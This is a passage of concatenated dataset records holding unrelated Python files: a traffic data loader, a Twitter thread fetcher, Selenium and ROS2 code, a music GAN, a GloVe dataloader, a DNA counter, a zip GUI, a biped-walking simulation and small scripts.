len_period=None, len_trend=None,\n# len_test=None, preprocess_name='preprocessing.pkl',\n# meta_data=True, meteorol_data=True, holiday_data=True):\ndef load_data(T=48, nb_flow=2, len_test=None, preprocess_name='preprocessing.pkl',\n meta_data=True, meteorol_data=True, holiday_data=True, window_len=12):\n # assert(len_closeness + len_period + len_trend > 0)\n # load data\n # 13 - 16\n data_all = []\n timestamps_all = list()\n for year in range(13, 17):\n fname = os.path.join(\n datapath, 'TaxiBJ', 'BJ{}_M32x32_T30_InOut.h5'.format(year))\n print(\"file name: \", fname)\n # stat(fname)\n data, timestamps = load_stdata(fname)\n # print(timestamps)\n # remove a certain day which does not have 48 timestamps\n data, timestamps = remove_incomplete_days(data, timestamps, T)\n data = data[:, :nb_flow]\n data[data < 0] = 0.\n data_all.append(data)\n timestamps_all.append(timestamps)\n print(\"\\n\")\n\n # minmax_scale\n data_train = np.vstack(copy(data_all))[:-len_test]\n print('train_data shape: ', data_train.shape)\n mmn = MinMaxNormalization()\n mmn.fit(data_train)\n data_all_mmn = [mmn.transform(d) for d in data_all]\n data_all_mmn_vstack = np.vstack(copy(data_all_mmn))\n timestamps_all_vstack = []\n for timestamps_element in timestamps_all:\n timestamps_all_vstack += timestamps_element\n # timestamps_all_vstack = np.vstack(copy(timestamps_all)\n\n fpkl = open(preprocess_name, 'wb')\n for obj in [mmn]:\n pickle.dump(obj, fpkl)\n fpkl.close()\n\n meta_feature = []\n if meta_data:\n # load time feature\n time_feature = timestamp2vec(timestamps_all_vstack)\n meta_feature.append(time_feature)\n if holiday_data:\n # load holiday\n holiday_feature = load_holiday(timestamps_all_vstack)\n meta_feature.append(holiday_feature)\n if meteorol_data:\n # load meteorol data\n meteorol_feature = load_meteorol(timestamps_all_vstack)\n meta_feature.append(meteorol_feature)\n\n meta_feature = np.hstack(meta_feature) if len(\n meta_feature) > 0 else np.asarray(meta_feature)\n metadata_dim = meta_feature.shape[1] if len(\n meta_feature.shape) > 1 else None\n if metadata_dim < 1:\n metadata_dim = None\n if meta_data and holiday_data and meteorol_data:\n print('time feature:', time_feature.shape, 'holiday feature:', holiday_feature.shape,\n 'meteorol feature: ', meteorol_feature.shape, 'mete feature: ', meta_feature.shape)\n\n X, Y, timestamps_X, meta_feature_X = data_slide_window_timestamps(data_all_mmn_vstack, 
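    # [illustrative sketch -- uses the helper defined above; the toy values are made up]
    # data_slide_window_timestamps turns a series into (window, next-step) pairs,
    # e.g. with window_len=3 on a toy series:
    #     data = [0, 1, 2, 3, 4]
    #     x, y, _, _ = data_slide_window_timestamps(data, data, data, window_len=3)
    #     # x == [[0, 1, 2], [1, 2, 3]] and y == [3, 4]
    # so each label y[i] is the slot immediately after its input window.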
window_len=window_len,\n timestamps=timestamps_all_vstack,\n meta_data=meta_feature)\n s = shuffle_data_many([X, Y, timestamps_X, meta_feature_X])\n X, Y, timestamps_X, meta_feature = s[0], s[1], s[2], s[3]\n X_train, X_test = X[:-len_test], X[-len_test:]\n Y_train, Y_test = Y[:-len_test], Y[-len_test:]\n\n if metadata_dim is not None:\n meta_feature_train, meta_feature_test = meta_feature[\n :-len_test], meta_feature[-len_test:]\n\n X_train.append(meta_feature_train)\n X_test.append(meta_feature_test)\n\n\n\n return X_train, Y_train, X_test, Y_test, mmn, metadata_dim, timestamp_train, timestamp_test\n\n\ndef generate_new_sample(x, T=6):\n nb_sample = len(x)\n x_new = []\n for i in range(T):\n tmp = []\n for j in range(nb_sample):\n tmp.append(x[j][i])\n x_new.append(tmp)\n return x_new\n\n\ndef shuffle_data_many(a):\n permutation = list(np.random.permutation(len(a[0])))\n a_shuffle = []\n for x in a:\n x_new = [x[i] for i in permutation]\n a_shuffle.append(x_new)\n return a_shuffle\n\n\n(T, nb_flow, len_test) = (48, 2, 1344)\nif __name__ == '__main__':\n X_train, Y_train, X_test, Y_test, mmn, external_dim, timestamp_train, timestamp_test = load_data(\n T=T, nb_flow=nb_flow, len_test=len_test, preprocess_name='preprocessing.pkl',\n meta_data=True, meteorol_data=True, holiday_data=True)\n\n print('love world')\n","sub_path":"expTaxiBJ/TaxiBJ_beifen.py","file_name":"TaxiBJ_beifen.py","file_ext":"py","file_size_in_byte":7097,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"97711289","text":"#!/usr/bin/env python\n# -*- encoding: utf-8 -*-\n\"\"\"\nUsage: rollup_thread.py --credentials= --url=\n rollup_thread.py -h --help\n\nOptions:\n --credentials=\n Path to an HCL or JSON file containing Twitter API credentials.\n The file should be a dict with four keys:\n * consumer_key\n * consumer_secret\n * access_token\n * access_token_secret\n\n --url=\n URL of the final tweet in the thread.\n\n\"\"\"\n\nimport docopt\n\nfrom backup_twitter import setup_api, TwitterCredentials\n\n\nif __name__ == '__main__':\n docopt_args = docopt.docopt(__doc__)\n\n credentials = TwitterCredentials.from_path(docopt_args['--credentials'])\n api = setup_api(credentials=credentials)\n\n status_id = docopt_args['--url'].split('/')[-1]\n\n thread = []\n\n while True:\n resp = api.statuses_lookup([status_id])\n assert len(resp) == 1\n tweet = resp[0]\n\n thread.insert(0, tweet)\n\n status_id = tweet.in_reply_to_status_id_str\n if status_id is None:\n break\n\n print(f'https://twitter.com/{tweet.user.screen_name}/status/{tweet.id_str}')\n print('---\\n')\n print('\\n\\n'.join(t.full_text for t in thread))\n","sub_path":"backup_twitter/rollup_thread.py","file_name":"rollup_thread.py","file_ext":"py","file_size_in_byte":1236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"530100726","text":"from selenium.webdriver.support import expected_conditions as EC\n\nfrom selenium.webdriver.common.by import By\nfrom .base_page import BasePage\n\n\nclass ProductsListPage(BasePage):\n popup = (By.XPATH, '//div[@class=\"vue-portal-target\"]//div[@role=\"presentation\"]')\n popup_close = (By.XPATH, \"//button[contains(@class, 'closeModal')]\")\n product_item = (By.CSS_SELECTOR, \"a[data-test='productPreviewInfo']\")\n\n def close_popup(self):\n self.wait.until(EC.visibility_of_element_located(self.popup_close)).click()\n self.wait.until(EC.invisibility_of_element_located(self.popup))\n assert 
self.is_not_element_present(*self.popup)\n\n def check_if_popup_is_present(self):\n self.wait.until(EC.visibility_of_element_located(self.popup))\n assert self.is_element_present(*self.popup)\n\n def open_product_card(self):\n self.wait.until(EC.visibility_of_element_located(self.product_item))\n random_section = self.get_random_item(self.product_item)\n random_section.click()\n","sub_path":"ennergia/Pages/products_list_page.py","file_name":"products_list_page.py","file_ext":"py","file_size_in_byte":1023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"146021017","text":"\nimport sys\n\nimport random\n\nimport rclpy\nfrom rclpy.node import Node\n\nfrom sample.msg import A,B,C\n\nclass Talker(Node):\n\n def __init__(self):\n super().__init__('talker')\n self.i = 0\n self.a_pub = self.create_publisher(A,'/a')\n self.b_pub = self.create_publisher(B, '/b')\n self.c_pub = self.create_publisher(C, '/c')\n\n timer_period = 1.0\n\n self.timer = self.create_timer(timer_period, self.timer_callback)\n\n self.a_sub = self.create_subscription(A, '/a', self.sub_a_callback)\n self.b_sub = self.create_subscription(B, '/b', self.sub_b_callback)\n\n def gen_a(self):\n a = A()\n a.x = 0.0\n a.y = random.randint(0, 1000) * 1.1\n a.int_arr = []\n for i in range(random.randint(3, 10)):\n a.int_arr.append(random.randint(0, 1000))\n\n return a\n\n def timer_callback(self):\n a = self.gen_a()\n self.i += 1\n a.x = self.i*1.0\n self.a_pub.publish(a)\n\n print(self.i)\n\n def sub_a_callback(self, msg):\n print('A msg xysum:',msg.xysum())\n b = B()\n b.BASE = msg\n b.another_a = self.gen_a()\n b.z = random.randint(0,100)*1.1\n\n self.b_pub.publish(b)\n\n def sub_b_callback(self, msg):\n print('B msg zbig:', msg.zbig())\n c = C()\n c.BASE = msg\n c.y = random.randint(0,10)*1.1\n\n print('C msg xysum:',c.xysum())\n print('C msg get_vnum:',c.get_vnum())\n\n self.c_pub.publish(c)\n\ndef main(args=None):\n if args is None:\n args = sys.argv\n\n rclpy.init(args=args)\n\n node = Talker()\n\n rclpy.spin(node)\n\n node.destroy_node()\n\n rclpy.shutdown()\n\n\nif __name__ == '__main__':\n main()\n\n\n\n\n\n","sub_path":"sample/ros_genmsg/talker_a_b_c.py","file_name":"talker_a_b_c.py","file_ext":"py","file_size_in_byte":1727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"479427252","text":"import sys\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pickle\nimport glob\nfrom keras.layers import LSTM\nfrom music21 import converter, instrument, note, chord, stream\nfrom keras.layers import Input, Dense, Reshape, Dropout, CuDNNLSTM, Bidirectional\nfrom keras.layers import BatchNormalization, Activation, ZeroPadding2D\nfrom keras.utils import np_utils\nimport numpy as np\nfrom keras.layers import Input\nfrom keras.models import Model, Sequential\nfrom keras.layers.core import Dense, Dropout\nfrom keras.layers.advanced_activations import LeakyReLU\nfrom keras.optimizers import Adam\n\n\ndef get_notes():\n ####################################نت ها از فایل midi خوانده می شوند #################################\n notes = []\n\n for file in glob.glob(\"Pokemon MIDIs/*.mid\"):\n midi = converter.parse(file)\n\n print(\"Parsing %s\" % file)\n\n notes_to_parse = None\n\n try: # file has instrument parts\n s2 = instrument.partitionByInstrument(midi)\n notes_to_parse = s2.parts[0].recurse()\n except: # file has notes in a flat structure\n notes_to_parse = midi.flat.notes\n\n for element in notes_to_parse:\n if 
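            # [illustrative sketch -- assumes only music21, as imported above]
            # a plain note is stored as its pitch name (e.g. 'C4'); a chord is
            # stored as its dot-joined normal-order pitch classes:
            #     c = chord.Chord(['C4', 'E4', 'G4'])
            #     '.'.join(str(n) for n in c.normalOrder)   # -> '0.4.7'
            # create_midi() later splits on '.' to tell the two cases apart.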
isinstance(element, note.Note):\n notes.append(str(element.pitch))\n elif isinstance(element, chord.Chord):\n notes.append('.'.join(str(n) for n in element.normalOrder))\n\n return notes\n\n\ndef prepare_sequences(notes, n_vocab):\n ####################################ساخت دنباله برای ورودی و خروجی مدل #################################\n sequence_length = 100\n\n # Get all pitch names\n pitchnames = sorted(set(item for item in notes))\n\n ####################################دیکشنری برای map کردن گام نت به int #################################\n note_to_int = dict((note, number) for number, note in enumerate(pitchnames))\n\n network_input = []\n network_output = []\n\n ####################################تولید دنباله ورودی .به ازای هر دنباله ورودی یک نت خروجی داریم که در یک آرایه ذخیره میکنیم #################################\n for i in range(0, len(notes) - sequence_length, 1):\n sequence_in = notes[i:i + sequence_length]\n sequence_out = notes[i + sequence_length]\n network_input.append([note_to_int[char] for char in sequence_in])\n network_output.append(note_to_int[sequence_out])\n\n n_patterns = len(network_input)\n\n\n ####################################تغییر ورودی به فرمتی که برای lstm قابل قبول باشد #################################\n network_input = np.reshape(network_input, (n_patterns, sequence_length, 1))\n\n ####################################نرمال کردن ورودی بین -1 و1 #################################\n network_input = (network_input - float(n_vocab) / 2) / (float(n_vocab) / 2)\n network_output = np_utils.to_categorical(network_output)\n\n return (network_input, network_output)\n\n\n\n\ndef create_midi(prediction_output, filename):\n ####################################تبدیل دنباله خروجی به نت وسپس تولید فایل موسیقی#################################\n offset = 0\n output_notes = []\n\n\n for item in prediction_output:\n pattern = item[0]\n ####################################در اینجا کتابخانه note21 تشخیص میدهد که آکورد هست یا نت معمولی#################################\n\n if ('.' 
in pattern) or pattern.isdigit():\n notes_in_chord = pattern.split('.')\n notes = []\n for current_note in notes_in_chord:\n new_note = note.Note(int(current_note))\n new_note.storedInstrument = instrument.Piano()\n notes.append(new_note)\n new_chord = chord.Chord(notes)\n new_chord.offset = offset\n output_notes.append(new_chord)\n\n else:\n new_note = note.Note(pattern)\n new_note.offset = offset\n new_note.storedInstrument = instrument.Piano()\n output_notes.append(new_note)\n\n # increase offset each iteration so that notes do not stack\n offset += 0.5\n\n midi_stream = stream.Stream(output_notes)\n midi_stream.write('midi', fp='output8.mid')\n\n\n\nrandomDim = 1000\n\n####################################خواندن داده(نت)#################################\nnotes = get_notes()\nn_vocab = len(set(notes))\nX_train, y_train = prepare_sequences(notes, n_vocab)\n\nseq_length = 100\nseq_shape = (seq_length, 1)\n# Optimizer\nadam = Adam(lr=0.0002, beta_1=0.5)\n\ndisc_loss = []\ngen_loss = []\n\n####################################شبکه اول Generator است که یک آرایه به صورت رندم به عنوان ورودی میگیرد این شبکه سعی می کند دنباله ای از نت را مشابه آنچه در مجموعه آموزش است به خروجی بدهد#################################\ngenerator = Sequential()\ngenerator.add(Dense(256, input_dim=randomDim))\ngenerator.add(LeakyReLU(0.2))\ngenerator.add(BatchNormalization(momentum=0.8))\ngenerator.add(Dense(512))\ngenerator.add(LeakyReLU(alpha=0.2))\ngenerator.add(BatchNormalization(momentum=0.8))\ngenerator.add(Dense(1024))\ngenerator.add(LeakyReLU(alpha=0.2))\ngenerator.add(BatchNormalization(momentum=0.8))\ngenerator.add(Dense(np.prod(seq_shape), activation='tanh'))\ngenerator.add(Reshape(seq_shape))\ngenerator.compile(loss='binary_crossentropy', optimizer=adam)\n\n####################################شبکه دوم Discriminator است که یک شبکه binary classification است که آموزش داده شده تا دنباله تولید شده توسط generator را ارزیابی کند. 
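# [illustrative sketch -- refers to the constant 242 used in generate() further down]
# prepare_sequences scales inputs by n_vocab/2, and generate() inverts that with a
# hard-coded 242, which is exact only when n_vocab == 484. A size-agnostic decode
# would be:
#     idx = int(x * (n_vocab / 2) + (n_vocab / 2))
#     idx = min(max(idx, 0), n_vocab - 1)   # clamp before the int_to_note lookup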
این شبکه دیتا واقعی را از مجموعه آموزش میگیرد همچنین ورودی دیگری از شبکه generator میگیرد و وظیفه آن تشخیص دنباله نت واقعی از غیر واقعی(نویز) است#################################\n\ndiscriminator = Sequential()\ndiscriminator.add(LSTM(512, input_shape=seq_shape, return_sequences=True))\ndiscriminator.add(Bidirectional(LSTM(512)))\ndiscriminator.add(Dense(512))\ndiscriminator.add(LeakyReLU(alpha=0.2))\ndiscriminator.add(Dense(256))\ndiscriminator.add(LeakyReLU(alpha=0.2))\ndiscriminator.add(Dense(1, activation='sigmoid'))\ndiscriminator.compile(loss='binary_crossentropy', optimizer=adam)\n\n####################################هاین شبکه دیتا واقعی را از مجموعه آموزش میگیرد و مچنین ورودی دیگری از شبکه generator میگیرد و وظیفه آن تشخیص دنباله نت واقعی از غیر واقعی(نویز) است#################################\n\ndiscriminator.trainable = False\nganInput = Input(shape=(randomDim,))\nx = generator(ganInput)\nganOutput = discriminator(x)\ngan = Model(inputs=ganInput, outputs=ganOutput)\ngan.compile(loss='binary_crossentropy', optimizer=adam)\n\ndLosses = []\ngLosses = []\n\n\ndef generate( input_notes):\n\n notes = input_notes\n pitchnames = sorted(set(item for item in notes))\n int_to_note = dict((number, note) for number, note in enumerate(pitchnames))\n\n #################################### به صورت رندم نویز تولید کرده و به عنوان ورودی به generatorld می دهیم#################################\n\n noise = np.random.normal(0, 1, (1, 1000))\n predictions = generator.predict(noise)\n\n pred_notes = [x * 242 + 242 for x in predictions[0]]\n\n pred_notes = [int_to_note[int(x)] for x in pred_notes]\n\n create_midi(pred_notes, 'gan_final')\n\ndef train(epochs, batchSize):\n\n\n notes = get_notes()\n n_vocab = len(set(notes))\n X_train, y_train = prepare_sequences(notes, n_vocab)\n batchCount = X_train.shape[0] / batchSize\n print\n 'Epochs:', epochs\n print\n 'Batch size:', batchSize\n print\n 'Batches per epoch:', batchCount\n real = np.ones((batchSize, 1))\n fake = np.zeros((batchSize, 1))\n for epoch in range(epochs):\n\n idx = np.random.randint(0, X_train.shape[0], batchSize)\n real_seqs = X_train[idx]\n noise = np.random.normal(0, 1, (batchSize, randomDim))\n # Generate fake sequence\n gen_seqs = generator.predict(noise)\n\n\n\n # Train discriminator\n discriminator.trainable = True\n d_loss_real = discriminator.train_on_batch(real_seqs, real)\n d_loss_fake = discriminator.train_on_batch(gen_seqs, fake)\n #discriminator loss\n d_loss = 0.5 * np.add(d_loss_real, d_loss_fake)\n\n # Train generator\n noise = np.random.normal(0, 1, size=[batchSize, randomDim])\n discriminator.trainable = False\n #generator loss\n g_loss = gan.train_on_batch(noise, real)\n #check again Hamide\n\n print(\"%d [D loss: %f] [G loss: %f]\" % (epoch, d_loss, g_loss))\n disc_loss.append(d_loss)\n gen_loss.append(g_loss)\n generate(notes)\n\n\n\nif __name__ == '__main__':\n train(10, 32)","sub_path":"ModelLstmGAN2.py","file_name":"ModelLstmGAN2.py","file_ext":"py","file_size_in_byte":9238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"618308491","text":"import re\nfrom sklearn.model_selection import train_test_split\nimport os\nimport time\nfrom tensorflow.contrib import learn\nfrom collections import Counter\nimport numpy as np\nimport copy\nimport math\nimport json\n\n\nclass Dataloader():\n def __init__(self, batch_size, Glove_embedding):\n self.batch_size = batch_size\n\n self.load_GloVe (Glove_embedding)\n\n #self.embedding = np.asarray(embedding)\n\n def 
load_GloVe(self, file_path):\n \"\"\"\n Load word embeddings in the format of GloVe.\n \n \"\"\"\n vocab = dict()\n embd = []\n with open(file_path,'r',encoding=\"utf8\") as file:\n for line in file.readlines():\n row = line.strip().split(' ')\n vocab[row[0]] = len(vocab)\n embd.append(row[1:])\n embedding = np.asarray(embd, dtype=np.float32)\n print('Loaded GloVe success') \n self.vocab = vocab\n self.embedding = embedding\n\n def tokenizer(self, iterator):\n for value in iterator:\n #print (value)\n yield re.split(r'\\s', value)\n\n\n\n def Processor(self, MAX_vo, tokenizer):\n processor = learn.preprocessing.VocabularyProcessor(MAX_vo, tokenizer_fn=tokenizer)\n return processor\n\n\n\n def Training_data_load(self, file_path, Glove_embedding):\n # Load Train data\n\n ID = []\n label = []\n sentence = []\n \n #assert (0)\n with open(file_path, encoding='utf-8') as f:\n line = f.readline()\n files = json.loads(line)\n for instance in files:\n ID.append(instance[\"ID\"])\n sentence1 = instance[\"Sentence\"]\n sentence.append(sentence1)\n label.append (instance[\"Label\"])\n \n MAX_vo = 50#\n\n vocab,embedding = self.load_GloVe (Glove_embedding)\n\n embedding = np.asarray(embedding)\n\n #prevent change\n processor = self.Processor(MAX_vo, self.tokenizer)\n processor.fit(vocab)\n sentence = np.array(list(processor.fit_transform(sentence)))\n #assert (0)\n\n\n # Shuffle the data\n \n shuffle_indices = np.random.permutation(np.arange(len(ID)))\n sentence = np.array(sentence)[shuffle_indices]\n label = np.array(label)[shuffle_indices]\n ID = np.array(ID)[shuffle_indices]\n\n\n # Split batches\n #print (len(self.label))\n self.batchNumber = int(len(ID) / self.batch_size) \n sentence_s = sentence[:self.batchNumber * self.batch_size]\n label_s = label[:self.batchNumber * self.batch_size]\n ID_s = ID[:self.batchNumber * self.batch_size]\n\n self.sentence_batches = np.split(sentence_s, self.batchNumber, 0)\n self.label_batches = np.split(label_s, self.batchNumber, 0)\n self.ID_batches = np.split (np.array(ID_s), self.batchNumber, 0)\n\n self.sentence_batches.append(sentence[self.batchNumber * self.batch_size : ])\n self.label_batches.append( label[self.batchNumber * self.batch_size : ])\n self.ID_batches.append (ID[self.batchNumber * self.batch_size : ])\n\n\n #print (\"The number of labels are : \",np.max(label))\n\n if len(ID) % self.batch_size != 0:\n self.batchNumber = int(len(ID) / self.batch_size) + 1\n #assert (0)\n self.pointer = 0\n return embedding\n\n \n def Test_data_load(self, file_path, Glove_embedding):\n # Load Test data\n\n ID = []\n sentence = []\n \n #assert (0)\n with open(file_path, encoding='utf-8') as f:\n line = f.readline()\n files = json.loads(line)\n for instance in files:\n ID.append(instance[\"ID\"])\n sentence1 = instance[\"Sentence\"]\n sentence.append(sentence1)\n \n MAX_vo = 50#\n\n vocab,embedding = self.load_GloVe (Glove_embedding)\n\n embedding = np.asarray(embedding)\n\n #prevent change\n processor = self.Processor(MAX_vo, self.tokenizer)\n processor.fit(vocab)\n sentence = np.array(list(processor.fit_transform(sentence)))\n \n\n # Split batches\n #print (len(self.label))\n self.batchNumber = int(len(ID) / self.batch_size) \n sentence_s = sentence[:self.batchNumber * self.batch_size]\n ID_s = ID[:self.batchNumber * self.batch_size]\n\n self.sentence_batches = np.split(sentence_s, self.batchNumber, 0)\n self.ID_batches = np.split (np.array(ID_s), self.batchNumber, 0)\n\n self.sentence_batches.append(sentence[self.batchNumber * self.batch_size : ])\n 
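        # [illustrative sketch -- `dl` and `total_records` are assumed names, not in this file]
        # np.split above yields batchNumber equal batches; the surrounding appends
        # keep any leftover rows as one extra, smaller batch:
        #     counts = [len(b) for b in dl.sentence_batches]
        #     assert sum(counts) == total_records
        #     assert all(c == dl.batch_size for c in counts[:-1])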
self.ID_batches.append (ID [self.batchNumber * self.batch_size : ])\n\n if len(ID) % self.batch_size != 0:\n self.batchNumber = int(len(ID) / self.batch_size) + 1\n #assert (0)\n self.pointer = 0\n return embedding\n\n\n\n def set_folder(self, folder):\n self.folder = folder\n\n def reset_pointer(self):\n self.pointer = 0\n\n\n def Train_next_batch(self):\n self.pointer = (self.pointer + 1) % self.batchNumber\n ret = self.sentence_batches[self.pointer], self.label_batches[self.pointer], self.ID_batches[self.pointer]\n return ret\n\n def Test_next_batch(self):\n self.pointer = (self.pointer + 1) % self.batchNumber\n ret = self.sentence_batches[self.pointer], self.ID_batches[self.pointer]\n return ret\n\n\n\n\n\n\ndata_loader_train = Dataloader(32, True)\ndata_loader_train.Training_data_load(\"question_2_data/train.json\", \"word_embedding/glove.6B.50d.txt\")\n\n","sub_path":"big-data-project-data-set/baozi-data/assignment_3/assignment_3/Q2/dataloader.py","file_name":"dataloader.py","file_ext":"py","file_size_in_byte":5553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"269039515","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Mar 18 09:10:14 2020\n\n@author: suyaqi\n\"\"\"\n#import matplotlib.pyplot as plt\nimport matplotlib.pyplot as plt\n#Input a DNA sequence\nseq=input('Please enter a DNA sequence:')\n#Count the number of AGCT in the input sequence\nA=seq.count('A')\nC=seq.count('C')\nG=seq.count('G')\nT=seq.count('T')\n#Make the frequency dictionary\ngene_dict={'A':A,'G':G,'C':C,'T':T}\nprint('The frequency dictionary of the input sequence is:',gene_dict)\n\n#Set labels and sizes based on the dictionary\nlabels = 'A','G','C','T'\nsizes = (A,G,C,T)\n#Set the colors of the pieplot\ncolors = 'lightgreen','lightskyblue','lightpink','grey'\n#Set all gaps to be 0\nexplode = (0,0,0,0)\n#Make the pieplot\nplt.pie(sizes, explode=explode,labels=labels,colors=colors,autopct='%1.1f%%',shadow=False, startangle=50)\n#Set the shape of the pieplot as circle\nplt.axis('equal')\nplt.show()","sub_path":"Practical 6/Counting DNA nucleotides.py","file_name":"Counting DNA nucleotides.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"240625302","text":"import tkinter as tk\nimport tkinter.filedialog as filedialog\nimport actor.zipper as zipper\nimport traceback\nfrom errorclass.zipyerror import ZipyError\n\n\nclass MainDisplay():\n def __init__(self):\n root = tk.Tk()\n root.geometry('420x240')\n self.dir_path = \"\"\n self.master = root\n self.create_widgets()\n \n def run(self):\n self.master.mainloop()\n\n def create_widgets(self):\n btn_select_dir = tk.Button(text=\"フォルダ選択\", command=self.select_dir)\n btn_select_dir.pack(side=\"top\", pady=10)\n\n lbl_disp1 = tk.Label(text=\"■フォルダパス:\")\n lbl_disp1.pack(side=\"top\")\n\n lbl_path = tk.Label(text=\"\")\n lbl_path.pack(side=\"top\")\n self.lbl_path = lbl_path\n\n lbl_disp2 = tk.Label(text=\"■パスワード:\")\n lbl_disp2.pack(side=\"top\")\n\n entry_pwd = tk.Entry(width=30)\n entry_pwd.pack(side=\"top\")\n self.entry_pwd = entry_pwd\n\n btn_select_dir = tk.Button(text=\"圧縮\", command=self.compress)\n btn_select_dir.pack(side=\"top\", pady=10)\n\n def select_dir(self):\n dir_path = filedialog.askdirectory()\n self.lbl_path[\"text\"] = dir_path\n self.dir_path = dir_path\n\n def compress(self):\n try:\n zipper.create_zip_file(self.dir_path, self.entry_pwd.get(), 1)\n except ZipyError:\n 
traceback.print_exc()\n\n\n","sub_path":"display/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"391460911","text":"import robotoc\nfrom robotoc_sim import MPCSimulation, CameraSettings\nfrom icub_simulator import iCubSimulator\nimport numpy as np\n\n\nmodel_info = robotoc.RobotModelInfo()\nmodel_info.urdf_path = '../icub_description/urdf/icub_lower_half.urdf'\nmodel_info.base_joint_type = robotoc.BaseJointType.FloatingBase\nbaumgarte_time_step = 0.05\nmodel_info.surface_contacts = [robotoc.ContactModelInfo('l_sole', baumgarte_time_step),\n robotoc.ContactModelInfo('r_sole', baumgarte_time_step)]\nrobot = robotoc.Robot(model_info)\n\nknee_angle = np.pi / 6\nstep_length = np.array([0.22, 0, 0]) \nstep_yaw = np.pi / 60\n\nstep_height = 0.1\nswing_time = 0.7\ndouble_support_time = 0.0\n# double_support_time = 0.05\nswing_start_time = 0.5\n\nvcom_cmd = 0.5 * step_length / (swing_time+double_support_time)\nyaw_rate_cmd = step_yaw / swing_time\n\nT = 0.7\nN = 25\nmpc = robotoc.MPCBipedWalk(robot, T, N)\n\nplanner = robotoc.BipedWalkFootStepPlanner(robot)\nplanner.set_gait_pattern(step_length, step_yaw, (double_support_time > 0.))\n# planner.set_raibert_gait_pattern(vcom_cmd, yaw_rate_cmd, swing_time, double_support_time, gain=0.7)\nmpc.set_gait_pattern(planner, step_height, swing_time, double_support_time, swing_start_time)\n\n# wrench cone\nX = 0.05\nY = 0.025\nmpc.get_contact_wrench_cone_handle().set_rectangular(X=X, Y=Y)\nmpc.get_impact_wrench_cone_handle().set_rectangular(X=X, Y=Y)\n\nt0 = 0.0\nq0 = np.array([0, 0, 0, 0, 0, 0, 1,\n 0.5*knee_angle, 0, 0, -knee_angle, 0.5*knee_angle, 0, # left leg\n 0.5*knee_angle, 0, 0, -knee_angle, 0.5*knee_angle, 0]) # right leg\nrobot.forward_kinematics(q0)\nq0[2] = - 0.5 * (robot.frame_position('l_sole')[2] + robot.frame_position('r_sole')[2]) \nv0 = np.zeros(robot.dimv())\noption_init = robotoc.SolverOptions()\noption_init.max_iter = 200\noption_init.nthreads = 4\nmpc.init(t0, q0, v0, option_init)\n\noption_mpc = robotoc.SolverOptions()\noption_mpc.max_iter = 1 # MPC iterations\noption_mpc.nthreads = 4\nmpc.set_solver_options(option_mpc)\n\ntime_step = 0.0025 # 400 Hz MPC\nicub_simulator = iCubSimulator(urdf_path=model_info.urdf_path, time_step=time_step)\ncamera_settings = CameraSettings(camera_distance=2.0, camera_yaw=45, camera_pitch=-10.0, \n camera_target_pos=q0[0:3]+np.array([0.7, 1.2, 0.0]))\nicub_simulator.set_camera_settings(camera_settings=camera_settings)\n\nsimulation_time = 20.0\nlog = False\nrecord = False\nsimulation = MPCSimulation(simulator=icub_simulator)\nsimulation.run(mpc=mpc, t0=t0, q0=q0, simulation_time=simulation_time, \n feedback_delay=True, verbose=False, \n record=record, log=log, name='icub_walk')\n\nif record:\n robotoc.utils.adjust_video_duration(simulation.name+'.mp4', \n desired_duration_sec=simulation_time)\n\nif log:\n q_log = np.genfromtxt(simulation.q_log)\n v_log = np.genfromtxt(simulation.v_log)\n t_log = np.genfromtxt(simulation.t_log)\n sim_steps = t_log.shape[0]\n\n vcom_log = []\n wcom_log = []\n vcom_cmd_log = []\n yaw_rate_cmd_log = []\n for i in range(sim_steps):\n R = robotoc.utils.rotation_matrix_from_quaternion(q_log[i][3:7])\n robot.forward_kinematics(q_log[i], v_log[i])\n vcom_log.append(R.T@robot.com_velocity()) # robot.com_velocity() is expressed in the world coordinate\n wcom_log.append(v_log[i][3:6])\n vcom_cmd_log.append(vcom_cmd)\n 
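        # [illustrative sketch -- `v_world` is an assumed name for robot.com_velocity()]
        # R is the base orientation built from the quaternion, so the transpose maps
        # world-frame quantities into the base frame:
        #     v_body = R.T @ v_world    # R is orthogonal, so R.T == inv(R)
        # which presumably keeps the logged velocity in the same frame as vcom_cmd.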
yaw_rate_cmd_log.append(yaw_rate_cmd)\n\n plot_mpc = robotoc.utils.PlotCoMVelocity()\n plot_mpc.plot(t_log, vcom_log, wcom_log, vcom_cmd_log, yaw_rate_cmd_log, \n fig_name=simulation.name+'_com_vel')\n","sub_path":"examples/icub/mpc/walk.py","file_name":"walk.py","file_ext":"py","file_size_in_byte":3625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"123275995","text":"import sys\n\ndef parse(tokens):\n\treturn list(map(int, tokens[1:-1].split(',')))\n\nfor line in open(sys.argv[1]):\n\tstreets, avenues = list(map(parse, line.rstrip().split(' ')))\n\toffset, count = avenues[-1] / streets[-1], 0\n\tfor x0, x1 in zip(streets[:-1], streets[1:]):\n\t\tp0, p1 = x0 * offset, x1 * offset\n\t\tfor y0, y1 in zip(avenues[:-1], avenues[1:]):\n\t\t\tcount += 1 if not (p1 <= y0 or p0 >= y1) else 0\n\tprint(count)","sub_path":"moderate/python/43_city_blocks_flyover.py3","file_name":"43_city_blocks_flyover.py3","file_ext":"py3","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"119469311","text":"import cv2\nimport math\nimport numpy as np\n\n# Read the original image\nimg = cv2.imread('assets/Regent street.JPG')\n\n# Gets the image rows and columns\nrows, cols = img.shape[:2]\n\n# New target image\ndst = np.zeros((rows, cols, 3), 